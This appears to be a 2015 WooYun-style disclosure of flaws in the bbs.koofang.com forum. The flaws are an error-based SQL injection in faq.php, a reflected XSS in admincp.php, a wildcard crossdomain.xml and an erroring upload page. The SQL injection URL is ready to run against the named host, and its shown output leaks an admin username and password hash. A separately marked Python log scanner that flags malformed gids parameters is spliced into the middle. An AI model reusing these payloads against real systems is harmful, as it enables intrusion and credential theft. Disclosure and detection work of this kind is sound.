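2015-12-06: Details reported to the vendor; awaiting vendor response
2015-12-11: The vendor chose to ignore the vulnerability; details disclosed to the public
As the title says.
0x01: SQL injection in faq.php on http://bbs.koofang.com
Exploit code: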
http://bbs.koofang.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20(select%20(select%20concat(username,0x27,password)%20from%20cdb_members%20limit%201)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('7','\',') and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from [Table]members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#')
Error: Duplicate entry 'admin'5e7a0a348c1f25d537e71d4de73f9ddb1' for key 'group_key'
Errno.: 1062
sqlmap screenshot:
Database: bbs_utf8 [112 tables]
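A defensive check for the 0x01 finding, as an added example that is not part of the original report or of the forum software's code: it scans access-log lines for faq.php?action=grouppermission requests whose gids parameters are not flat integer group ids. The log lines are constructed, and the rule that a group id is a 1 to 5 digit integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; client addresses are documentation placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Dec/2015:10:00:01 +0800] "GET /faq.php?action=grouppermission&gids[]=7&gids[]=10 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Dec/2015:10:00:07 +0800] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201)%23 HTTP/1.1" 200 812',
    '203.0.113.9 - - [06/Dec/2015:10:00:09 +0800] "GET /faq.php?action=faq&id=1 HTTP/1.1" 200 4096',
    '203.0.113.7 - - [06/Dec/2015:10:00:12 +0800] "GET /forumdisplay.php?fid=2 HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FLAT_KEY_RE = re.compile(r'^gids\[\d*\]$')  # gids[] or gids[12]: one array level only
GROUP_ID_RE = re.compile(r'^\d{1,5}$')      # assumption: group ids are small integers


def check_gids(url):
    """Return the reasons a request's gids parameters fail the integer allowlist."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if not parts.path.endswith('/faq.php') or ('action', 'grouppermission') not in params:
        return []
    reasons = []
    for key, value in params:
        if not key.startswith('gids'):
            continue
        if not FLAT_KEY_RE.match(key):
            reasons.append(f'nested or malformed key {key!r}')
        if not GROUP_ID_RE.match(value):
            reasons.append(f'non-integer value for {key!r}')
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every log line that violates the allowlist."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reasons = check_gids(match.group(1)) if match else []
        if reasons:
            findings.append((number, reasons))
    return findings


if __name__ == '__main__':
    for number, reasons in scan(SAMPLE_LOG):
        print(f'line {number}: ' + '; '.join(reasons))
```

The same allowlist (flat keys, integer values only) is what the server-side handler should enforce before the ids reach the IN (...) clause.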
0x02: XSS
http://bbs.koofang.com/admincp.php?infloat=yes&handlekey=123);alert(/WooYun/);//
As shown in the screenshot:
0x03: Flash cross-domain policy
http://bbs.koofang.com/crossdomain.xml
* means any domain.
0x04: A code error
http://beijing.koofang.com/up.php
I'm here looking for a gift!
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-11 21:40
Vulnerability Rank: 4 (WooYun rating)
None yet